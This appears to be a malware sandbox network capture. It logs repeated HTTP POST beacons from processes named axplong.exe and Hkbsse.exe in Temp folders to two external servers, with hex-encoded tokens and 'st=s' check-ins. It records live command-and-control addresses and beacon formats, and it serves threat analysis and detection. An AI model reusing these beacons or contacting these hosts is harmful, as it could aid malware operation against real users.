Jun 27, 2024 05:59:54.034648895 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:54.225816965 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.7	49866	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:53.448878050 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:54.080140114 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.7	49867	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:54.205137968 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:54.898636103 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:54.905796051 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:55.129405022 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.7	49868	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:54.354283094 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:55.006942987 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:55.039038897 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:55.235250950 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.7	49869	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:55.253612995 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:55.960992098 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.7	49870	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:55.361979961 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:55.995435953 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:56.112802029 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:56.307221889 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.7	49871	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:56.125056028 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:56.828109026 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.7	49872	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:56.419843912 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:57.058845997 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:57.060344934 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:57.252357960 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.7	49873	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:56.966381073 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:57.642260075 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.7	49874	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:57.388087034 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:58.049397945 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:58.050791979 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:58.252723932 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.7	49875	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:57.685523987 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:58.367336988 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.7	49877	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:58.717185974 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:59.332580090 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:59.336196899 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:59.532686949 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.7	49878	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:58.731707096 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:59.426548004 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:59.439774036 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:59.663266897 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.7	49879	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:59.655262947 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 06:00:00.334528923 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 06:00:00.335517883 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 06:00:00.531450987 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.7	49880	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:59.788208008 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 06:00:00.511681080 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 06:00:00.520452023 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
